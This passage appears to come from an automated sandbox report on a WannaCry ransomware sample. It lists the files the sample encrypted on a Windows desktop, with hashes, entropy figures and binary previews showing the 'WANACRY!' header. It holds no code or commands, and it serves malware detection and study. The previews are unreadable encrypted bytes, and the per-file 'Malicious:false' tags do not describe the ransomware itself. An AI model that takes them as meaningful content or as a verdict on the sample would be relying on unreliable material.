                                                  Preview:... Q.....v.C.({....I......`..'.n.0.kds...8*......6\...0a..,..:O.;.X....`...M.<>..r|...J.n....*.r.FV.Ei"5..>.....P.........1.V.(.|[....g.7^../.'./l.^../.?L.O..Z..s.,#.lk*......2)..i.Z0.Gl.......2.IT.:......Tye........q........'.2.y.e.Tr.mM......o.,2.C;..{......Ag#.J._Z.u:..5;......n....+..2. o.c.z.8..X.f]...Y...(.c..=..V.."..2..Q.w...$..*.5.Z.*8..f.....(.l3P...@"....t...e.uc..d."..A.g.(..QC...f.p_.t..j.I.U.....;.,..k...!>.t.qE}..#....+RI_......t.y.-..........GGs.{.9.SAD.~..N8".)r7*_.......{.t..i.Q..r....!...).%-..gk?.... .+..U.j.....;.../T"....&..&M.C.n..7..4..x.i.CbY.q.._....&...'...y.E...H.)...mL...)DA...`..........e.,...uT...s.....l7:.r..?&=...T.$. .a.i3....W..]m.}...6K.|..4..p..N\Ze..o.KD.^....x)A......g9-..._.(t......?Q..qH..Dn.@....|.8S..%.....?.HwI../.t..U..\..z.##..=.w......".....2.....v....R?..Pt.=Y....<5...............1...Co..Fn.P.}*...&...L...Dc...e..i..;.X..<....r. Z.kj..&..0.d.!..::....m>..q..............G...T......JYM.

                                                  C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.840207851552836
                                                  Encrypted:false
                                                  SSDEEP:24:bkn8Kf1uX/2p+JN0jg/yiuRtX0GyUzf9d/OKXI8dA1GMXjcBopusXCM:bkn81ukig/yJRR0Gy+lZrXNlYcauuf
                                                  MD5:25B05C352B83FB5ED412DFD2F07B0C34
                                                  SHA1:58694C9244A0A1C0379277A76D3C4C550BC6B646
                                                  SHA-256:334B7A0ECB3B534B37334F4A4BFD7B409DBF275CBC5B7048D04FB0CBB3937107
                                                  SHA-512:ECEA88BB703757AAA04B04077365BA57A9591FCBA6F7AC57685D9B6778E811362CD7D25894C31342EC3B46F03CC65FD83516D8AE4AE830950C007AB57648E6BD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....|..*^....U.....J..Q.....>;_P.P}6k.R..W..\...B..Oh.FD|./yg.p...{..`GMtI...fI.|.....R.3.u..3s\BE.6....87..|...K.;q._..d.W.C.^k....F.G.-...=.P, .../lOy .......k..$..}^LoC....=p.U....@iFU.+.%|.lO.S..J^.+"`..<.W+.7..Y._'......F..6..9...<.+'...l?............m{#....,..D..H!..."#...t....N..M..6b...G...Z..,.x......:JM(..]...Ev.s.g:'....JE.f..r.......y..._.y..;T%S..wV....G.F.}.-....j..V.>$...nMQ.w....6.t#....2./'....D?.1.S.bd.}.d......u..`.9'..c/...6~.....V^&;.]......V*.0.3V..&..T.Y.j.kf......$....V...~.X.:.R.N.7Y}.[.~.8.....yC...R.DM..P1%...8[.....Y.....ng.s...~.....H....\vP@...F.n_...t........g..v6U.+t...$.Xh*..\.s...S}....(y.....Vu.....;nA&......`i.;.>....dk....iY.!..9..k&w.....D...).\...SF.]....._.fJ...'.7y{...FG...d..#......(.n^=N....B.nx._....Bk.<.....A.,J..PnZ...-...d.@ap..!.x....u...e.^........LI3..p.9.......0...#...lT.c.Y:...8..!x[N..x..p...D..b..P.B..M(...^UG.."...}!1..K..5%..L...{g....7.....Nt..11.(cn.C%.$^.....J)&ed.....

                                                  C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.840207851552836
                                                  Encrypted:false
                                                  SSDEEP:24:bkn8Kf1uX/2p+JN0jg/yiuRtX0GyUzf9d/OKXI8dA1GMXjcBopusXCM:bkn81ukig/yJRR0Gy+lZrXNlYcauuf
                                                  MD5:25B05C352B83FB5ED412DFD2F07B0C34
                                                  SHA1:58694C9244A0A1C0379277A76D3C4C550BC6B646
                                                  SHA-256:334B7A0ECB3B534B37334F4A4BFD7B409DBF275CBC5B7048D04FB0CBB3937107
                                                  SHA-512:ECEA88BB703757AAA04B04077365BA57A9591FCBA6F7AC57685D9B6778E811362CD7D25894C31342EC3B46F03CC65FD83516D8AE4AE830950C007AB57648E6BD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....|..*^....U.....J..Q.....>;_P.P}6k.R..W..\...B..Oh.FD|./yg.p...{..`GMtI...fI.|.....R.3.u..3s\BE.6....87..|...K.;q._..d.W.C.^k....F.G.-...=.P, .../lOy .......k..$..}^LoC....=p.U....@iFU.+.%|.lO.S..J^.+"`..<.W+.7..Y._'......F..6..9...<.+'...l?............m{#....,..D..H!..."#...t....N..M..6b...G...Z..,.x......:JM(..]...Ev.s.g:'....JE.f..r.......y..._.y..;T%S..wV....G.F.}.-....j..V.>$...nMQ.w....6.t#....2./'....D?.1.S.bd.}.d......u..`.9'..c/...6~.....V^&;.]......V*.0.3V..&..T.Y.j.kf......$....V...~.X.:.R.N.7Y}.[.~.8.....yC...R.DM..P1%...8[.....Y.....ng.s...~.....H....\vP@...F.n_...t........g..v6U.+t...$.Xh*..\.s...S}....(y.....Vu.....;nA&......`i.;.>....dk....iY.!..9..k&w.....D...).\...SF.]....._.fJ...'.7y{...FG...d..#......(.n^=N....B.nx._....Bk.<.....A.,J..PnZ...-...d.@ap..!.x....u...e.^........LI3..p.9.......0...#...lT.c.Y:...8..!x[N..x..p...D..b..P.B..M(...^UG.."...}!1..K..5%..L...{g....7.....Nt..11.(cn.C%.$^.....J)&ed.....

                                                  C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80676028200717
                                                  Encrypted:false
                                                  SSDEEP:24:rSJpEQMygrTNx917rqyh7Qns2DJDpE9l7CFu1OQlIkTxVM+X4P:+JpE9yQXrWlUsclI8xCP
                                                  MD5:8FC59C942D4674990F2316F7AB80A2A1
                                                  SHA1:744A515110B2A5925BCD5C5D730ADCFD5BE45819
                                                  SHA-256:242224D879528B17B1D050AB74C49736815934FEE16801AC93C0E10AD92FCC74
                                                  SHA-512:2B61BAA88001FEAE752EE5E44FACC36C2B9CDE666F7C97F087BA6591D573BBD4D19D1038F2690B5556C68F20E626C121E75D6942F42560BD6FE61EB4EFE5583C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..|p....9X71...L.R:.)"..1=R0>.A.m..#j(^.Mx .C......ib...9.O..._v.N8..Y..&.8\..1^T].....F...Z...R-.\.$...E....w"...>r.. .......[xA.w.V$..hf......G...+.X..F.o.-)-.E../....hw...............S.....J....vp...+`kR..(H......|.a.0.-o....~..P..=.f.C0&...yX....o.....G.?.....*.&.IW...,"F.c..m..jL.p.:6....T...1..Wm......V0.."..j..C..k.)6.vXdA..tXySf...c.Y...G...3.J....S.i...}......0.=....|.....T....Q@..u...O.&.....TW(.]....3..P.b..z.'J.....N.Aw..v4.$$:$c.*..b;..W..3.;.....C..1.>.sr_.P..)....;.....|..U.@/....,....T`.G ...-.#VV./..a.e.;.]hu...ts..K.........t....PXe.j$../..n1Q...~.3...Tqp....i.b^L[..x..Q...Y..E..$=...}:.K.....@p0.6BY.,. H.B..0.[/...,..eo..... .Yl\..`b....u.6.....w...<L.....u.U...R.O......$.K....).$.....4..S.._].....\.=$..%k.xV\.....U.|#.VXgC....$.*..J.J.......0..'u..K...m.k......u....0=.n..)......k.U......-.ho)j...}v#..)E"....=.B."...ne.wo......i.....`q.d.J..[:#.&.W."(..0..].....&..H.9?...r..g..M...V.H_..6....<Fo.......k!..h9..N#..*

                                                  C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856515267934988
                                                  Encrypted:false
                                                  SSDEEP:24:bkLI415SP0k9wxGO5+rWcgTNooX7kcmFbD8MGYadCuAFV3z7q6rcjTF6y:bkLbxG7mN/zITw2F9nqgM6y
                                                  MD5:B163A07E4A1237A8E7C9744BE05FDAE9
                                                  SHA1:E92B0A9544352B22F9F4BA3AB99E81B8FB95D460
                                                  SHA-256:0E444C8BF7A7E7223260B726055AD57B84CB33564F92AB59FBB729B42DD9E449
                                                  SHA-512:97E87B3C805347A3ECFCB4E01D3178957200B6928772F1EC3627011C5779B2DDF3AF5AB379B828A01F3B149CB2C4D5CAC4676A7F78D905B6E8623543CC4C4F36
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....(.M^.....#*q..+...k.:...Z..p...-K.c.].b.......rh\..J...,I..'.a+...+.Kg.s?."....hp..q.'...@k....-.Xi.0.#.G......B...y?':.}(...:..Q...wL.P....1.7t.B).U.A.P.mZ'...zA.P....7...7...&.L..E....ZJH.N...u>..C$...."..j^A..u... ....me.>..S...G...M.l.%..............A...-..m...v..2...[.YL.....=..-9.;}.K.u.U.v?.?.).(u..m%9,..m.........1H...F.(..`..0.X=..`.wg..t.r......N.nu.7x.....$..9R....O".#..V...\..E.o.L..Zz....]jia>.n(.,g.B^.Kt..}........U.f.)S.U....h..g.Z...(.r...j...Bi....../B}..(@.k...||..q..3.nra.>.f.Q.....PO.v..V.A.Y..2...gI8....Q.C.z..J.v|E...@`O.y........e..$W....-...L.....K......[....(<.@8....Qm..H.,..Q.h4cEp...J.8..Ja\.6.....}g. ..{zr...4.ZuH.H"....i.%.....u....N^....k4P..B.]..].:.i-1.R..m=......2.8..})....!0.....lya..E.Q...eP..i.6..eU......C...=..<&............DM..m!..$......l.........../.ij..6....../.Wj..z.2..\.d..r.96...!+g>]..|..Y....2F....E..5.S0vOT..0.0zx....}....3.O.]N.QT.|...$........v.b...S.......V.YDW0aL.E.....LJ..

                                                  C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856515267934988
                                                  Encrypted:false
                                                  SSDEEP:24:bkLI415SP0k9wxGO5+rWcgTNooX7kcmFbD8MGYadCuAFV3z7q6rcjTF6y:bkLbxG7mN/zITw2F9nqgM6y
                                                  MD5:B163A07E4A1237A8E7C9744BE05FDAE9
                                                  SHA1:E92B0A9544352B22F9F4BA3AB99E81B8FB95D460
                                                  SHA-256:0E444C8BF7A7E7223260B726055AD57B84CB33564F92AB59FBB729B42DD9E449
                                                  SHA-512:97E87B3C805347A3ECFCB4E01D3178957200B6928772F1EC3627011C5779B2DDF3AF5AB379B828A01F3B149CB2C4D5CAC4676A7F78D905B6E8623543CC4C4F36
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....(.M^.....#*q..+...k.:...Z..p...-K.c.].b.......rh\..J...,I..'.a+...+.Kg.s?."....hp..q.'...@k....-.Xi.0.#.G......B...y?':.}(...:..Q...wL.P....1.7t.B).U.A.P.mZ'...zA.P....7...7...&.L..E....ZJH.N...u>..C$...."..j^A..u... ....me.>..S...G...M.l.%..............A...-..m...v..2...[.YL.....=..-9.;}.K.u.U.v?.?.).(u..m%9,..m.........1H...F.(..`..0.X=..`.wg..t.r......N.nu.7x.....$..9R....O".#..V...\..E.o.L..Zz....]jia>.n(.,g.B^.Kt..}........U.f.)S.U....h..g.Z...(.r...j...Bi....../B}..(@.k...||..q..3.nra.>.f.Q.....PO.v..V.A.Y..2...gI8....Q.C.z..J.v|E...@`O.y........e..$W....-...L.....K......[....(<.@8....Qm..H.,..Q.h4cEp...J.8..Ja\.6.....}g. ..{zr...4.ZuH.H"....i.%.....u....N^....k4P..B.]..].:.i-1.R..m=......2.8..})....!0.....lya..E.Q...eP..i.6..eU......C...=..<&............DM..m!..$......l.........../.ij..6....../.Wj..z.2..\.d..r.96...!+g>]..|..Y....2F....E..5.S0vOT..0.0zx....}....3.O.]N.QT.|...$........v.b...S.......V.YDW0aL.E.....LJ..

                                                  C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Secret Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.792760690895553
                                                  Encrypted:false
                                                  SSDEEP:24:Sz/F7EyhEqItP3JXovsgi3KqQIcpe2GglqtmC80i+l3MWYViI8or1:SzJEyh/ItykhP3cpe2Smx0i+Sicr1
                                                  MD5:E30D97EE5934E9889D663FA21BFFFB42
                                                  SHA1:277F5C25B363AFF68D01410EC4D6DEE0B2BAAD2A
                                                  SHA-256:D47167585F8326B885F16C6B61BBB07BD037F8C1FE01F72A3851DE903D1D7433
                                                  SHA-512:3BCD807FBBF0743B95C006236369597EFD159C9FFD3C4D0A4EFA32E6849C2FD592C409906B82D0F75061C03031C3DA89C27F5B51B3D65AB36E724F3C9F39EBC0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..DH93.G...T.w...g..%..>y.....;....R.&cCk....E._k..P....>.z5'#R\.C.......IH.%.s.4.8U.u.H..Hz...z.xWF...TYHrB.d.......F..>.j.#^p..e7.Y.D.;...T.4...c?/.)f...H....l...Y..'....{..%....2....&..U)y.<M.Ul..0.V.t..q.b7V...N.e%..W./xp.^..h"]...`....b..<..k...N.......|.w<.V.;............' tu..4..^1.........).8.`.b...q........{*.K.........o.[.3.H4&.}..!.2/.l.G.M.T.h."(...D].5E.......7.=)JwFZ.SLO..p.......7..N).5.X.M..L.+..Cy/>?.(...e.1..Do..'t97..e...T.....;E.y.B.9.....c~...;...t.l.[.n..$(...)M.!.E..I...j6...E......D.o..x1...C....B....=.8."..y.>7...&9VE1..e..,.....&\....C'.."..D...D..:......C........N.4......{..Es.'.....#x....D.Ud.d&..IYK..Au=.R..A.._.?.+.4..X.`^~?.u.?..9..,..pL.....4:..Lk.U...(U..Gn .>.>r......."......a.k.2.1......Ds1.9.x..s.. ..n...6..yoD..L.B.].i......... .T>.....N.....6.V..n...5....6o.DN.B@.............H4..y..~.(y.U......v.Ug..\..)..nj.r..(....PZ.......^..j....am."..*.yyJ.{..I....X(\?.:i.H'a..(.$}K..`.p(..t....u.bi.BDVr.g"nA..|..~.

                                                  C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855939068436425
                                                  Encrypted:false
                                                  SSDEEP:24:bk3mx9VQ3BHn7JFcoNCReHoPFZfb1tzBcLxcqqHq8aoIlwqSYp:bkJt7JFbCQIPFZfRtaeqqKH0Yp
                                                  MD5:D4DA30CFAA2A6BA071C3D2272707598F
                                                  SHA1:33C60BDC92CB0190CF80EAFECBEDE83C4510306F
                                                  SHA-256:6765CF8A9EFBF3C5CA2CCB2951566479994C2A61D70476C04CA00F09591ABAA5
                                                  SHA-512:C7675B751AB1DCF72FD5A11EDE9E0C1D05CF6910FC2BAC1E7CAF2B7D8D7124910146627BD97277CEFA1CA0B85EF174F838F6008BFE3073C45980092AF830B620
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......!.6u..]'..q..>}.kM..E.|...^.Ul...G.7.pu...S..TX..E.B....e..L.z.n.FZ.1...`.N.U..5.o...e.....l....C..v....A.6p{..U...n%....P?...Z"`."........#N.<...n.....ABR..mC..z.O...`.I..9.c;.H9!...U@.z...U.z....`.iM.V./....98g....'Z..\...........a................t0/..raP......q..`}...?.v?..v.A.^..,......~.....C.\.8..KE..HH/.a..!i..U.3....R.Z....b/....W?.]..D......J<.zL..d.......C...k..`Pp$P.IT.....b.Qo.I:.J..|.j!.kAx..Z....A..$.o.x.;..-+.bn..W=..;..8.9..4.=>z...t.@!.U.H.2...Ny.....&!...7hT.n.{...@..'.*..P%0V../...U...$.T.O.wf[D..!T..-@j.......8.....e....K2..#.]gRTt..D..*...p.......{....L...A...d.....;.&....1...1.5......x.T..t3^....w.....Y..#..J.O.~..R......oB...i~|r...n...VrmU.I.p....AJ.u.<`<.}T.r8 ...PV......R....Eq...7F.+;...N....U+.....#Ga.fv_..'..!.`....(.\....r,,.pV..Q,...wp...,..fI.....u..9.S....>...e#...].rl.x.tm.5.H_/[...;.....,...Y .G...."x..j.!.c%..4....QU.y..n..V...2........L7...[........P....B..Z?.......H........hD.

                                                  C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855939068436425
                                                  Encrypted:false
                                                  SSDEEP:24:bk3mx9VQ3BHn7JFcoNCReHoPFZfb1tzBcLxcqqHq8aoIlwqSYp:bkJt7JFbCQIPFZfRtaeqqKH0Yp
                                                  MD5:D4DA30CFAA2A6BA071C3D2272707598F
                                                  SHA1:33C60BDC92CB0190CF80EAFECBEDE83C4510306F
                                                  SHA-256:6765CF8A9EFBF3C5CA2CCB2951566479994C2A61D70476C04CA00F09591ABAA5
                                                  SHA-512:C7675B751AB1DCF72FD5A11EDE9E0C1D05CF6910FC2BAC1E7CAF2B7D8D7124910146627BD97277CEFA1CA0B85EF174F838F6008BFE3073C45980092AF830B620
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......!.6u..]'..q..>}.kM..E.|...^.Ul...G.7.pu...S..TX..E.B....e..L.z.n.FZ.1...`.N.U..5.o...e.....l....C..v....A.6p{..U...n%....P?...Z"`."........#N.<...n.....ABR..mC..z.O...`.I..9.c;.H9!...U@.z...U.z....`.iM.V./....98g....'Z..\...........a................t0/..raP......q..`}...?.v?..v.A.^..,......~.....C.\.8..KE..HH/.a..!i..U.3....R.Z....b/....W?.]..D......J<.zL..d.......C...k..`Pp$P.IT.....b.Qo.I:.J..|.j!.kAx..Z....A..$.o.x.;..-+.bn..W=..;..8.9..4.=>z...t.@!.U.H.2...Ny.....&!...7hT.n.{...@..'.*..P%0V../...U...$.T.O.wf[D..!T..-@j.......8.....e....K2..#.]gRTt..D..*...p.......{....L...A...d.....;.&....1...1.5......x.T..t3^....w.....Y..#..J.O.~..R......oB...i~|r...n...VrmU.I.p....AJ.u.<`<.}T.r8 ...PV......R....Eq...7F.+;...N....U+.....#Ga.fv_..'..!.`....(.\....r,,.pV..Q,...wp...,..fI.....u..9.S....>...e#...].rl.x.tm.5.H_/[...;.....,...Y .G...."x..j.!.c%..4....QU.y..n..V...2........L7...[........P....B..Z?.......H........hD.

                                                  C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824693748645433
                                                  Encrypted:false
                                                  SSDEEP:24:ufJV5Uio6PDRe4nDNMz3VV/OjgTzE6WOTKXceNPJwK57kFxMqD2n5:0JV0cgA2jn2+2hNPSK57k0nn5
                                                  MD5:5C1258FA6EB4A7CA8DEF84613E949FB6
                                                  SHA1:E9866B0512F65915CEF74D86596392291DD34A72
                                                  SHA-256:B717F20424050A12E4F5D8E5D0183AD2AF4C0885E296C434759E156FAEEAA539
                                                  SHA-512:53B384845D566A9EF1435CE8BD77A7AEC65C4133ED5B419D3CB10617AFAE0F992E84C5931E84EDEB86B2316C23B8438989DF0943A345D3FA7040973B3591ADA5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:........F[.h..q2...h....o7;w....d....X.5..c.jG7....1..8+..PF{&.q4.-..B...9....D.A...... ..7x.M..{.a.4T.;"........M/.,q.%..../.......(.X....s.3\..5.0.w.C&..Q....U.F..{...R(...6..o.K.htOb.V.4\-..$.A}{.:;.D{.....H..HC....U]7. {.B.S..x=....#..Q....$;H..6..........I.{69|....5..G.(..#.J......)....^...v.R.J4..bb...c}:7d"\c.f..>.d*.s...v.]..3..K`...y..`M....#...r...o..e.c2.....&........D!.SIw..t|X.?...D......I6P......W.....N.....m.R..y....D.Xm.EO...3\;.8p..../}......c?.<.c...v..i${..........l.kx............(...&...=../.iwi..z=.z..>.........Q. ......P..c...l..n.........fxoy........>..O.S,....)A_.V.Q.......=.m>../^M......@....pa_.XS[.*..d....<.../..Z.3i._.`-w..2.WV.....M.n<.....0..d...2.o..xQ.3..../I!.}.4.(.c..%......`.....x<......2.)..-.....p.....T..w.......)`Z........Z.....SR.....a..3..L.9.t.= .zf...0....h...r...D..f.Z.'[....24.L.&.Hoe...In...aF?....\.#.......pQVe.%...7].h.%..C..}.].-.. .!.M.e......"jtr....w..q.p..C6.}.s......F....Kw_..j.

                                                  C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849805205167774
                                                  Encrypted:false
                                                  SSDEEP:24:bk1EsmSEu2cxI4obGP97LdePklC4ycBj8YDyaL0KLHi:bkCny2cxGGP9tN7TTWaL9Hi
                                                  MD5:E2E175B95982C1837C1719E9902A3BBF
                                                  SHA1:EBBDC3450D0E86980A741AFEF4297D0E1861CC5E
                                                  SHA-256:FCCBFD4E65BA524E9711CCC1F4543C1C42534BF2B8C00C9FE7F402329B16514D
                                                  SHA-512:F9B54A2CE40A19E8224E6747A10B253ED465CD9013E8BE987FD3F92E8F262DA9CDEF033D4B8154ADAC68643E5CBEDD5EDD59F8C3E5F0CBD21C77203FF2F972C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R.8..?.9.: ......_..$........%.....QN\.-....6.....I...P..8...0J...rJ...Y.....j)`+.........H...+j.M._..t.+....u.L.0g...iH{6.`h.....b#@>.-..*W._j>.Mw....u....|wI(U.."Qz..^.:. . b..Bc#.+.J=v8I..s2d.?.|`m....Y.W...AL*...*nL.........D..3.Bm..L.........s................6..|z..B.%.k..3...B..|....);.V.fLb]-Y..............Uf....N.z3E.+T.vs...E|.^H..B....[..%T).%.E..j^....r`<.._|.t.]..jbJ..a...xKV.iR....[n.R./f......dUa.~.....2+(..U..Yb..,.....T.H..%JQ?..8.\:...-...!g.?.\a$..tu..%;+&V....<~y......6.{.....X~......Yq..b@.Fd."...U..j....Vi.!..a4...q .....!..W....f..l..P....AS..bv.......Kem.W...%.![.X @*o......n...@.wz.\.....4|9....S. .%.5..e.]....W.2^'/..f....@..>..0.4.:..QD...^..3.,.I..Sk...^.W3.]...{W.....w.^.~....b+..g..#~F!..8..r...n.G...,....a..@,..<..HWl}.j...h'.l.*z-....L..SL..'...GJ;n1...e../...w..q...N.}.......k.,.{@..[_Sm.(..z..)..=b...3.Z.{s=..h=.......7.&FP......|.\..pv..../+..........L.....k2..Dn6..gGN.m.s]]F.B..".....*..g.9.....t..

                                                  C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849805205167774
                                                  Encrypted:false
                                                  SSDEEP:24:bk1EsmSEu2cxI4obGP97LdePklC4ycBj8YDyaL0KLHi:bkCny2cxGGP9tN7TTWaL9Hi
                                                  MD5:E2E175B95982C1837C1719E9902A3BBF
                                                  SHA1:EBBDC3450D0E86980A741AFEF4297D0E1861CC5E
                                                  SHA-256:FCCBFD4E65BA524E9711CCC1F4543C1C42534BF2B8C00C9FE7F402329B16514D
                                                  SHA-512:F9B54A2CE40A19E8224E6747A10B253ED465CD9013E8BE987FD3F92E8F262DA9CDEF033D4B8154ADAC68643E5CBEDD5EDD59F8C3E5F0CBD21C77203FF2F972C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R.8..?.9.: ......_..$........%.....QN\.-....6.....I...P..8...0J...rJ...Y.....j)`+.........H...+j.M._..t.+....u.L.0g...iH{6.`h.....b#@>.-..*W._j>.Mw....u....|wI(U.."Qz..^.:. . b..Bc#.+.J=v8I..s2d.?.|`m....Y.W...AL*...*nL.........D..3.Bm..L.........s................6..|z..B.%.k..3...B..|....);.V.fLb]-Y..............Uf....N.z3E.+T.vs...E|.^H..B....[..%T).%.E..j^....r`<.._|.t.]..jbJ..a...xKV.iR....[n.R./f......dUa.~.....2+(..U..Yb..,.....T.H..%JQ?..8.\:...-...!g.?.\a$..tu..%;+&V....<~y......6.{.....X~......Yq..b@.Fd."...U..j....Vi.!..a4...q .....!..W....f..l..P....AS..bv.......Kem.W...%.![.X @*o......n...@.wz.\.....4|9....S. .%.5..e.]....W.2^'/..f....@..>..0.4.:..QD...^..3.,.I..Sk...^.W3.]...{W.....w.^.~....b+..g..#~F!..8..r...n.G...,....a..@,..<..HWl}.j...h'.l.*z-....L..SL..'...GJ;n1...e../...w..q...N.}.......k.,.{@..[_Sm.(..z..)..=b...3.Z.{s=..h=.......7.&FP......|.\..pv..../+..........L.....k2..Dn6..gGN.m.s]]F.B..".....*..g.9.....t..

                                                  C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808252857964589
                                                  Encrypted:false
                                                  SSDEEP:24:8c7nuG8KrmN1cwd/iycCSAA4LzWHjYMt4tgpJVbpPpQi3XzAElaDB8Gia:8wJ8KrberSAlY07ypJVbpRQi3X1cDB8M
                                                  MD5:21A1614C2FA810863177725C016EC1E1
                                                  SHA1:895166AF0C193AD661F6AC244C81E00AC347B534
                                                  SHA-256:DC1D239A74055845FDB687708BA1A791C7E79EAE3FABBAC678FD4239BE3C7811
                                                  SHA-512:83A06BC9F21775810E73D70FE7423A1D5350373534F5181CB6C2942767860EA41306542E6E792CFF610C2610714B1BC296792E3B72E78B4383CB116E7B1031C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:7C...&p.w.l..J=.Z.Qv(/B...)$......w.U._.S.............06\..Q....>....Z.......R.8.....j.Y.m/-...i.(L....9o..Z..3..,.M{m.....o.....h.....>...Y....s...m.........g.....u...m..6... u......N1H.Y,...io.rr..k.....tc.6...p.d.H..?hOl.S......Buo.|....M.qa.....{....ie.....IYP......C..A.......#Rg.......e...T....K.N..f>..0v.$....P..)GjIYLs.7$.CU`...A..V...9..o)Z]...6.....'M..=U..$...e.. ...../.@..n.n>.h!.|...>7pVATo..IN...Y.DIy;.5d..%xG.=k.pj...V[...o....(..Y..7..>.sD2....X..l.=i..*YS.c.j..x..TE..F.G..EW.,z...=%..&.Y'.9.....e.0H..u..BU..b.P...N..G..y.V.g.j..'.Ch:..+`5(....*.v.A....="r.....l.Q!.Q....H...8..N...;.0.G..>...a.I...Rk.G..,W.8+.|%..\......Cm.[e.n..+.W....y..9......h.....`.K....*.r...`.....W.t..>.I.#.[du..d(..u8..H...D.B0"....1.I....).#._...+...,.St.....'f..s......b`.An.....W..-......*..E_..fv....3.cSm-,....|.....`>-_.F.].F2..2(.7..d.kB.&....i...58U..G....`z.] <.>.[..,....uLm.....3m.*..'..2JS.....S.L`....Nx8E1.........D.A.'..dG.$OM

                                                  C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8392789198126795
                                                  Encrypted:false
                                                  SSDEEP:24:bkiD6eCCD+YiNjJ1RqS2doN07NODAMxjphsBDjz4ksC6Ju/2gU2m9m+s0MswRI3:bkDrCD+YiNt11aW4oBpSDMnu+Imr1
                                                  MD5:12E8027A4D2F1292CC39394C76B2E3E3
                                                  SHA1:8CE9A2E1E04D58A798A34543FA6AD313AA7ABEDE
                                                  SHA-256:F3786950FDFBFC583F39E04D693140FF577E734E30A58C6BB58FB1E40CDCD0B9
                                                  SHA-512:2559E44192A1C374D6AE71267D5903F346567AEBECBD14127C23F6A77AFB3F74B50CC6F512610DF7C5CB6C512892CB804531F403FB44A518770D3B1B6958B45A
                                                  Malicious:false
                                                  Reputation:unknown
